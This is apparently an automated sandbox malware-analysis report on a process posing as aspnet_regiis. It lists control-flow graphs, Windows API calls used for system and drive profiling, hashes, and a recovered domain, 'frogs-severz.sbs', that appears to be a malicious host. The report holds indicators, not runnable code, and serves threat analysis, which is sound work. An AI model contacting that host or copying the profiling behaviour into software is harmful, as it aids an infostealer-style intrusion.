                                                                        • String ID: 1>>;$KJI'
                                                                        • API String ID: 2243422189-1477294040
                                                                        • Opcode ID: 847f08f29d29bece75da8bc157f857930574a9ff508ec84ca1b266fe61f1a5d9
                                                                        • Instruction ID: 64d8b959ddb6a5651dddef023630091108c65508323258226c93c7010b1e6965
                                                                        • Opcode Fuzzy Hash: 847f08f29d29bece75da8bc157f857930574a9ff508ec84ca1b266fe61f1a5d9
                                                                        • Instruction Fuzzy Hash: AA02C771604B818EE729CF35C5917A3BBD2EF57344F0889AEC2DB8B282D739A505CB51

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 409 2f5dda7-2f5dde6 call 2f834c0 call 2f59b80 CoUninitialize 414 2f5ddf0-2f5de38 409->414 414->414 415 2f5de3a-2f5de57 414->415 416 2f5de60-2f5de7a 415->416 416->416 417 2f5de7c-2f5dee4 416->417 418 2f5def0-2f5df3b 417->418 418->418 419 2f5df3d-2f5df4e 418->419 420 2f5df50-2f5df5f 419->420 421 2f5df6b-2f5df76 419->421 422 2f5df60-2f5df69 420->422 423 2f5df78-2f5df79 421->423 424 2f5df8b-2f5df98 421->424 422->421 422->422 425 2f5df80-2f5df89 423->425 426 2f5dfbb-2f5dfc3 424->426 427 2f5df9a-2f5dfa1 424->427 425->424 425->425 428 2f5dfc5-2f5dfc6 426->428 429 2f5dfdb-2f5dfe5 426->429 430 2f5dfb0-2f5dfb9 427->430 431 2f5dfd0-2f5dfd9 428->431 432 2f5dfe7-2f5dfeb 429->432 433 2f5dffb-2f5e007 429->433 430->426 430->430 431->429 431->431 434 2f5dff0-2f5dff9 432->434 435 2f5e021-2f5e13b 433->435 436 2f5e009-2f5e00b 433->436 434->433 434->434 438 2f5e140-2f5e16a 435->438 437 2f5e010-2f5e01d 436->437 437->437 439 2f5e01f 437->439 438->438 440 2f5e16c-2f5e194 438->440 439->435 441 2f5e1a0-2f5e225 440->441 441->441 442 2f5e22b-2f5e278 call 2f5bb50 441->442
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: Uninitialize
                                                                        • String ID: <?$LMNW$Tl$frogs-severz.sbs
                                                                        • API String ID: 3861434553-2681481848
                                                                        • Opcode ID: 2ecb5cdc956c59c698481c9f1bdafe2de73f87a594bb796b822ce9f059bf7abd
                                                                        • Instruction ID: cc22b41cd825eedd8e69dbee12c7baa6777cbc7c8662dba5ac0ae60852492c84
                                                                        • Opcode Fuzzy Hash: 2ecb5cdc956c59c698481c9f1bdafe2de73f87a594bb796b822ce9f059bf7abd
                                                                        • Instruction Fuzzy Hash: BAB1F17190D3928FD3398F25C0917ABBBE1EFE2344F19895DE9CA9B241D774440A8B92

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02F58D12
                                                                        • GetCurrentThreadId.KERNEL32 ref: 02F58D25
                                                                        • GetCurrentProcessId.KERNEL32 ref: 02F58D2D
                                                                        • GetForegroundWindow.USER32 ref: 02F58E2A
                                                                        • ExitProcess.KERNEL32 ref: 02F58EF4
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                        • String ID:
                                                                        • API String ID: 4063528623-0
                                                                        • Opcode ID: cb0404258745ba820d8d4a296651a5da8c76c27f822cdb4ab4d0286457631ead
                                                                        • Instruction ID: c1f142e1f8b372c49994082af4dd3738477e663b162b8051d0fb8b6c9815f053
                                                                        • Opcode Fuzzy Hash: cb0404258745ba820d8d4a296651a5da8c76c27f822cdb4ab4d0286457631ead
                                                                        • Instruction Fuzzy Hash: 1E41AB73F8062807E31CADB9DCDA369B5975BC4248F0E853EAE459B394EDB88D0906C0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 467 2f7e596-2f7e5c7 468 2f7e5d0-2f7e5f8 467->468 468->468 469 2f7e5fa-2f7e603 468->469 470 2f7e605-2f7e60f 469->470 471 2f7e620-2f7e647 469->471 472 2f7e610-2f7e619 470->472 475 2f7e650-2f7e685 471->475 472->472 474 2f7e61b 472->474 474->471 475->475 476 2f7e687-2f7e690 475->476 477 2f7e692-2f7e698 476->477 478 2f7e6ab-2f7e6b7 476->478 479 2f7e6a0-2f7e6a9 477->479 480 2f7e6d1-2f7e714 call 2f90350 GetPhysicallyInstalledSystemMemory call 2f6fec0 478->480 481 2f7e6b9-2f7e6bb 478->481 479->478 479->479 487 2f7e719-2f7e732 480->487 483 2f7e6c0-2f7e6cd 481->483 483->483 485 2f7e6cf 483->485 485->480 488 2f7e740-2f7e776 487->488 488->488 489 2f7e778-2f7e7b4 488->489 490 2f7e7c0-2f7e7d8 489->490 490->490 491 2f7e7da-2f7e7e3 490->491 492 2f7e7e5-2f7e7ee 491->492 493 2f7e7fd-2f7e800 491->493 494 2f7e7f0-2f7e7f9 492->494 495 2f7e802-2f7e80a 493->495 494->494 496 2f7e7fb 494->496 497 2f7e80c-2f7e80f 495->497 498 2f7e81b-2f7e827 495->498 496->495 501 2f7e810-2f7e819 497->501 499 2f7e83b-2f7e896 498->499 500 2f7e829-2f7e82f 498->500 503 2f7e8a0-2f7e900 499->503 502 2f7e830-2f7e839 500->502 501->498 501->501 502->499 502->502 503->503 504 2f7e902-2f7e90b 503->504 505 2f7e92d 504->505 506 2f7e90d-2f7e916 504->506 508 2f7e930-2f7e93c 505->508 507 2f7e920-2f7e929 506->507 507->507 509 2f7e92b 507->509 510 2f7e93e-2f7e944 508->510 511 2f7e95b-2f7e9f0 508->511 509->508 512 2f7e950-2f7e959 510->512 512->511 512->512
                                                                        APIs
                                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 02F7E6FC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: InstalledMemoryPhysicallySystem
                                                                        • String ID: =G>D$nBLR$wt&h
                                                                        • API String ID: 3960555810-4232340594
                                                                        • Opcode ID: fad5c356d7b7a7b689865ba72fc80b612dbee828399aaa21330abe53946edd2a
                                                                        • Instruction ID: d950fcbdda42dd8d86aed6b11612bf42ab019d0f61b01f2f1d2433053f720f99
                                                                        • Opcode Fuzzy Hash: fad5c356d7b7a7b689865ba72fc80b612dbee828399aaa21330abe53946edd2a
                                                                        • Instruction Fuzzy Hash: FDC1CA75A047818FD725CF3984907A3BBE2AF57344F1889AEC1EB8B742D7796406CB11

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 646 2f7cdba-2f7e647 call 2f82f20 call 2f584e0 652 2f7e650-2f7e685 646->652 652->652 653 2f7e687-2f7e690 652->653 654 2f7e692-2f7e698 653->654 655 2f7e6ab-2f7e6b7 653->655 656 2f7e6a0-2f7e6a9 654->656 657 2f7e6d1-2f7e6f0 call 2f90350 655->657 658 2f7e6b9-2f7e6bb 655->658 656->655 656->656 661 2f7e6f5-2f7e714 GetPhysicallyInstalledSystemMemory call 2f6fec0 657->661 660 2f7e6c0-2f7e6cd 658->660 660->660 662 2f7e6cf 660->662 664 2f7e719-2f7e732 661->664 662->657 665 2f7e740-2f7e776 664->665 665->665 666 2f7e778-2f7e7b4 665->666 667 2f7e7c0-2f7e7d8 666->667 667->667 668 2f7e7da-2f7e7e3 667->668 669 2f7e7e5-2f7e7ee 668->669 670 2f7e7fd-2f7e800 668->670 671 2f7e7f0-2f7e7f9 669->671 672 2f7e802-2f7e80a 670->672 671->671 673 2f7e7fb 671->673 674 2f7e80c-2f7e80f 672->674 675 2f7e81b-2f7e827 672->675 673->672 678 2f7e810-2f7e819 674->678 676 2f7e83b-2f7e896 675->676 677 2f7e829-2f7e82f 675->677 680 2f7e8a0-2f7e900 676->680 679 2f7e830-2f7e839 677->679 678->675 678->678 679->676 679->679 680->680 681 2f7e902-2f7e90b 680->681 682 2f7e92d 681->682 683 2f7e90d-2f7e916 681->683 685 2f7e930-2f7e93c 682->685 684 2f7e920-2f7e929 683->684 684->684 686 2f7e92b 684->686 687 2f7e93e-2f7e944 685->687 688 2f7e95b-2f7e9f0 685->688 686->685 689 2f7e950-2f7e959 687->689 689->688 689->689
                                                                        APIs
                                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 02F7E6FC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: InstalledMemoryPhysicallySystem
                                                                        • String ID: =G>D$wt&h
                                                                        • API String ID: 3960555810-1734137225
                                                                        • Opcode ID: dcaadafadde578e139e81c98e0edbe6c7bcf74da9f77c9b0a5809ba38d49c0c1
                                                                        • Instruction ID: dc6d9d99e2778e1ea1314c1cbe0203c6f40733726787fd89ebb99c3497a45e33
                                                                        • Opcode Fuzzy Hash: dcaadafadde578e139e81c98e0edbe6c7bcf74da9f77c9b0a5809ba38d49c0c1
                                                                        • Instruction Fuzzy Hash: 95B1C775A04B818FD725CF39C4907A3BBE2AF56348F1889AEC1EB87742D775A406CB11

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 690 2f842dc-2f843ba call 2f68800 GetSystemMetrics * 2 698 2f843c1-2f84452 690->698
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: MetricsSystem
                                                                        • String ID:
                                                                        • API String ID: 4116985748-3916222277
                                                                        • Opcode ID: 8473571b5907ddc50d6d8870c1f1f3380f15a7977ce9ecf68b8193b3f751a158
                                                                        • Instruction ID: 20400b80793dfaede4a0aa8dc6b6c7faa737b144dc8fe9f472e761da8ca2064d
                                                                        • Opcode Fuzzy Hash: 8473571b5907ddc50d6d8870c1f1f3380f15a7977ce9ecf68b8193b3f751a158
                                                                        • Instruction Fuzzy Hash: 435173B4D142088FDB40EFACD985A9EBBF0BB48310F11852EE459E7354D734A955CF92

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 705 2f74b09-2f74b0e 706 2f74b17 705->706 707 2f74b10-2f74b15 705->707 708 2f74b1a-2f74b3a call 2f584d0 706->708 707->708 712 2f74b41 708->712 713 2f74b59-2f74b63 708->713 714 2f74b49-2f74b54 call 2f584e0 708->714 712->714 716 2f74b65-2f74b6a 713->716 717 2f74b6c 713->717 721 2f750e3-2f750ef 714->721 719 2f74b73-2f74bb2 call 2f584d0 716->719 717->719 723 2f74bc0-2f74c26 719->723 723->723 724 2f74c28-2f74c37 723->724 725 2f74c51-2f74c5e 724->725 726 2f74c39-2f74c3f 724->726 728 2f74c81-2f74c8c call 2f90ea0 725->728 729 2f74c60-2f74c64 725->729 727 2f74c40-2f74c4f 726->727 727->725 727->727 732 2f74c91-2f74c99 728->732 730 2f74c70-2f74c7f 729->730 730->728 730->730 733 2f74cb6-2f74cbe 732->733 734 2f74ca6-2f74cad 732->734 735 2f74e45-2f74f03 732->735 736 2f74f93-2f74faf 732->736 737 2f74ca0 732->737 738 2f74e2a 732->738 739 2f74e18-2f74e22 732->739 740 2f74cc7 733->740 741 2f74cc0-2f74cc5 733->741 734->733 742 2f74f10-2f74f69 735->742 743 2f74fb0-2f74fe1 736->743 737->734 738->735 739->738 744 2f74cce-2f74d7f call 2f584d0 740->744 741->744 742->742 745 2f74f6b-2f74f89 call 2f72e30 742->745 743->743 746 2f74fe3-2f7506f 743->746 753 2f74d80-2f74d9d 744->753 745->736 749 2f75070-2f75097 746->749 749->749 752 2f75099-2f750be call 2f72ca0 749->752 752->721 753->753 756 2f74d9f-2f74da7 753->756 757 2f74dc1-2f74dce 756->757 758 2f74da9-2f74dae 756->758 760 2f74df1-2f74e11 GetLogicalDrives call 2f90ea0 757->760 761 2f74dd0-2f74dd4 757->761 759 2f74db0-2f74dbf 758->759 759->757 759->759 760->736 760->738 760->739 762 2f74de0-2f74def 761->762 762->760 762->762
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LO
                                                                        • API String ID: 0-4218834679
                                                                        • Opcode ID: dccf53b8b54f1a1efa1185178a04be9f583919dd1efe389931a40f8c4a40d5ac
                                                                        • Instruction ID: 97543eb424daf761baac644f94679f5db64fb1e3e2342b71fb94f791a2358f80
                                                                        • Opcode Fuzzy Hash: dccf53b8b54f1a1efa1185178a04be9f583919dd1efe389931a40f8c4a40d5ac
                                                                        • Instruction Fuzzy Hash: 8BE1DEB59083408FD310DF65E89066FBBF5EF85394F04892DFA858B380E7788905CB86
                                                                        APIs
                                                                        • LdrInitializeThunk.NTDLL(02F6180D), ref: 02F8E5DE
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 765 2f8717b-2f8719f call 2f90350 768 2f871a1 765->768 769 2f871a3-2f871a6 765->769 768->769 770 2f871a8 769->770 771 2f871aa-2f871dd GetUserDefaultUILanguage 769->771 770->771 772 2f871df-2f871e2 771->772 773 2f8721b-2f87249 772->773 774 2f871e4-2f87219 772->774 774->772
                                                                        APIs
                                                                        • GetUserDefaultUILanguage.KERNELBASE ref: 02F871B0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: DefaultLanguageUser
                                                                        • String ID: YM23
                                                                        • API String ID: 95929093-3181622464
                                                                        • Opcode ID: 25e9467752e025a1d1a0d76535e0a6ba06db0f97aa872ab765dfba3e54d0678e
                                                                        • Instruction ID: c0dd50f4ac5440c10a66bce20133d579db11a8088aa5236dd74b13918bdcfc55
                                                                        • Opcode Fuzzy Hash: 25e9467752e025a1d1a0d76535e0a6ba06db0f97aa872ab765dfba3e54d0678e
                                                                        • Instruction Fuzzy Hash: 27212438A046988FEB18DA38C8953E8BBA1AB4A350F1481EDC68987784CA344B84CF41
                                                                        APIs
                                                                        • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 02F8E57B
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: f93cc63222c0c2daa4f2b587a792196a1347a9b7e88adc62570dc326ea9db4e4
                                                                        • Instruction ID: 20195e06ae847df059823e8ce96ffd1d8c62df5421300cb51e522fe9789450b6
                                                                        • Opcode Fuzzy Hash: f93cc63222c0c2daa4f2b587a792196a1347a9b7e88adc62570dc326ea9db4e4
                                                                        • Instruction Fuzzy Hash: 0C1174B7F483114BD314AE79EC84717FA97ABD5240F0E8938EE8893345E6769C0582D1
                                                                        APIs
                                                                        • GetForegroundWindow.USER32 ref: 02F8E7D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: ForegroundWindow
                                                                        • String ID:
                                                                        • API String ID: 2020703349-0
                                                                        • Opcode ID: 030cb1982bfe823efeb1c356fc1ccce7a63a1e5d8a0cd560d0d722c1d16122e9
                                                                        • Instruction ID: d860cfa06e37242b37ff9f874f8e863afc972a40aaaf2a425eb83f6d6cbc6189
                                                                        • Opcode Fuzzy Hash: 030cb1982bfe823efeb1c356fc1ccce7a63a1e5d8a0cd560d0d722c1d16122e9
                                                                        • Instruction Fuzzy Hash: 4111F9367542009BD3089F68E8A259FB7E5D766298F040C3DE6F2CB342D2A5C94A9B52
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(?,00000000,?), ref: 02F8B9F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: e883e75c4dbbe0bf7bda9ed34072aeaba68d15138e09a9a13ff2fcd923ff7c6a
                                                                        • Instruction ID: 5694d26b03619ada9da652be0abd6794f553d5743310efe81dcaf83041687ac7
                                                                        • Opcode Fuzzy Hash: e883e75c4dbbe0bf7bda9ed34072aeaba68d15138e09a9a13ff2fcd923ff7c6a
                                                                        • Instruction Fuzzy Hash: 5FF02B7069C3448BD7085B28E87572ABBE5DF93209F04497DE0C1877D2D73A445ACB22
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: BlanketProxy
                                                                        • String ID:
                                                                        • API String ID: 3890896728-0
                                                                        • Opcode ID: 47cfb73f3ba32cb41d4410b01e24ac4b10ff9a8463e20c4418e1b81798b99435
                                                                        • Instruction ID: f180b6959d6e09f3b8e0ca2e62ea389683209a08f7bd52ab890f1ddbf0ce501f
                                                                        • Opcode Fuzzy Hash: 47cfb73f3ba32cb41d4410b01e24ac4b10ff9a8463e20c4418e1b81798b99435
                                                                        • Instruction Fuzzy Hash: E0F06D745047018FD314DF28D1A8756BBE0FF85358F11490CE59A8B391D7759559CF81
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: BlanketProxy
                                                                        • String ID:
                                                                        • API String ID: 3890896728-0
                                                                        • Opcode ID: 052513d77a3d7a29db2036165c082c75a1a38d998b12466d5b349a4d8005e95a
                                                                        • Instruction ID: eb1963651cd99030a7b99864fd703d9a816300c8761e1c3bd1b07bfacf41b721
                                                                        • Opcode Fuzzy Hash: 052513d77a3d7a29db2036165c082c75a1a38d998b12466d5b349a4d8005e95a
                                                                        • Instruction Fuzzy Hash: 33F0747460D3418FE754DF69C1A871BBBE1AB88348F11891DE4998B380CBB99958CF82
                                                                        APIs
                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 02F5CD03
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID:
                                                                        • API String ID: 2538663250-0
                                                                        • Opcode ID: 7cf1882caca39e9d48822d32d4009cf747560e3c67bbebdc14f9ec8dd44f204d
                                                                        • Instruction ID: 1be0dc7c2d934c7f48ce8ac0970b71c681544e5f664a4005b62c85b45cb62573
                                                                        • Opcode Fuzzy Hash: 7cf1882caca39e9d48822d32d4009cf747560e3c67bbebdc14f9ec8dd44f204d
                                                                        • Instruction Fuzzy Hash: 89D0A770AE434CABD694775CEC17F16B72D9702BA5F040A2AB3B3C61C1DA106A24C576
                                                                        APIs
                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02F5CD35
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                        • Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeSecurity
                                                                        • String ID:
                                                                        • API String ID: 640775948-0
